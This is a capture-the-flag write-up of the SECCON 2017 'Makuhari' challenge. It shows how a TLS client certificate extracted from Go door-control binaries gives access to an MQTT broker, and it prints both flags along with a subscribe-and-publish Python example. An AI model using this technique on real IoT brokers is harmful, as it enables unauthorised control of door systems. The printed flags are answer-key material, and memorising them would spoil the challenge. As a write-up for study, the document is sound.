This write-up describes the Makuhari (幕張) challenge given at the SECCON 2017 final competition for domestic teams.
The following two binaries were provided.
- dooriccreaderapp_v1
  - SHA-256: 5ba48b4bb315b33250b812fb0deefdda5aac19d2db07d9bf26239215d4c51dfc
  - ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
- doorlockctlapp_v1
  - SHA-256: e65bf81d3c6ccc32407c7f9d63f3db8dd52307bb8decc39070cf8d0dd1240204
  - ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
Both binaries are written in Go and attempt to connect to an MQTT broker in order to control a smart door and an IC card reader.
```
# ./doorlockctlapp_v1 --help
Usage of ./doorlockctlapp_v1:
  -h string
        MQTT broker address (default "makuhari.seccon")
  -p string
        MQTT broker port (default "1883")
# ./dooriccreaderapp_v1 --help
Usage of ./dooriccreaderapp_v1:
  -h string
        MQTT broker address (default "makuhari.koth.seccon")
  -i string
        idm hex representation without hex prefix (default "000000000000")
  -p string
        MQTT broker port (default "8883")
```
In the competition, makuhari.seccon didn't exist, but makuhari.koth.seccon at 10.0.13.1 could be reached over MQTT with TLS.
Both executables contain the TLS certificate and key files used to connect to the MQTT broker. The first flag is located in the client certificate, as shown below.
```
$ openssl x509 -in client.crt -text
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 12132904043160716613 (0xa860bbf1c27ec545)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=JP, ST=Tokyo, L=Senjyu, O=SECCON, CN=secconfinaltrust
        Validity
            Not Before: Feb 17 00:08:17 2018 GMT
            Not After : Feb 17 00:08:17 2019 GMT
        Subject: C=JP, ST=Tokyo, L=Makuhari, O=Eag1eJum7, CN=debug.makuhari/emailAddress=SECCON{CLIENT_CERT_IS_C0MM0N_BY_DELIVERY_REAS0N}
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
```
The second flag was published periodically by the MQTT broker (makuhari.koth.seccon). We could see it by subscribing to the topic "mkhr/v/1/access/controller" (see makuhari_subscribe.py):
```
mkhr/v/1/access/controller: {"idm": "0114514810191900", "device-uuid": "1565a6cc-718a-4b35-ab5c-272b3ceadd17"}
mkhr/v/1/access/controller: {"idm":"000000000000","device-uuid":"80b5d612-4b5a-4f7a-986d-99532e206c7c","dt":1518848233}
mkhr/v/1/access/controller: {"warn": "DoorCtl firmware update is broken. DoorCtl firmware update is scheduled at 2018/02/17 15:00(JST)."}
mkhr/v/1/access/controller: {"second_flag": "SECCON\\{MQTT_1N_THE_W1LD\\}"}
mkhr/v/1/access/controller: {"idm": "0146581920292901", "device-uuid": "80b5d612-4b5a-4f7a-986d-99532e206c7c"}
```
After the DoorCtl firmware update (announced in the MQTT warning above), we saw the following message:
```
mkhr/v/1/access/controller: {"warn": "Submit your flag(json). \ttopic: mkhr/v/1/access/controller, 'devise-uuid':'door devise of outgoing no one else', 'idm':'closed person', 'flag':'your flag' "}
```
We earned defence points by publishing our defence keyword in that format to the same topic (see makuhari_publish.py).
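An added example covering both the subscribe step and the flag submission described above; it is not the write-up's own makuhari_subscribe.py or makuhari_publish.py. It assumes paho-mqtt is installed and that the certificate material extracted from the binaries was saved as ca.crt, client.crt and client.key (file names are an assumption). The message parser is written to cope with arbitrary payloads, since the shared client certificate means anyone holding the binary can publish to the topic.

```python
import json

TOPIC = "mkhr/v/1/access/controller"

# Sample payloads copied from the messages quoted in the write-up (constructed input, not live traffic).
SAMPLE_LINES = [
    '{"idm": "0114514810191900", "device-uuid": "1565a6cc-718a-4b35-ab5c-272b3ceadd17"}',
    '{"warn": "DoorCtl firmware update is broken."}',
    '{"second_flag": "SECCON\\\\{MQTT_1N_THE_W1LD\\\\}"}',
]


def classify(payload):
    """Parse one controller message (str or bytes) and tag it by kind.

    Returns a dict with "kind" in {"flag", "warn", "access", "unknown"}.
    Malformed or non-object JSON is reported as "unknown" instead of raising,
    so a single bad publish cannot kill the subscriber loop.
    """
    try:
        msg = json.loads(payload)
    except (ValueError, TypeError):
        return {"kind": "unknown", "raw": payload}
    if not isinstance(msg, dict):
        return {"kind": "unknown", "raw": payload}
    flags = {k: v for k, v in msg.items() if k.endswith("flag")}
    if flags:
        return {"kind": "flag", **flags}
    if "warn" in msg:
        return {"kind": "warn", "warn": msg["warn"]}
    if "idm" in msg and "device-uuid" in msg:
        return {"kind": "access", "idm": msg["idm"],
                "device_uuid": msg["device-uuid"], "dt": msg.get("dt")}
    return {"kind": "unknown", "raw": payload}


def build_submission(device_uuid, idm, flag):
    """Defence-keyword payload in the format announced by the firmware-update
    warning (the key is spelled 'devise-uuid' there, so it is used as printed)."""
    return json.dumps({"devise-uuid": device_uuid, "idm": idm, "flag": flag})


def run(host="makuhari.koth.seccon", port=8883, ca="ca.crt", cert="client.crt",
        key="client.key", submission=None):
    """Connect over TLS with the extracted client certificate, print every
    classified message on TOPIC and optionally publish one submission."""
    import paho.mqtt.client as mqtt  # assumption: paho-mqtt available
    try:  # paho-mqtt 2.x requires an explicit callback API version
        client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
    except AttributeError:  # paho-mqtt 1.x
        client = mqtt.Client()
    client.tls_set(ca_certs=ca, certfile=cert, keyfile=key)
    client.on_message = lambda _c, _u, m: print(m.topic, classify(m.payload))
    client.connect(host, port, 60)
    client.subscribe(TOPIC)
    if submission:
        client.publish(TOPIC, submission)
    client.loop_forever()
```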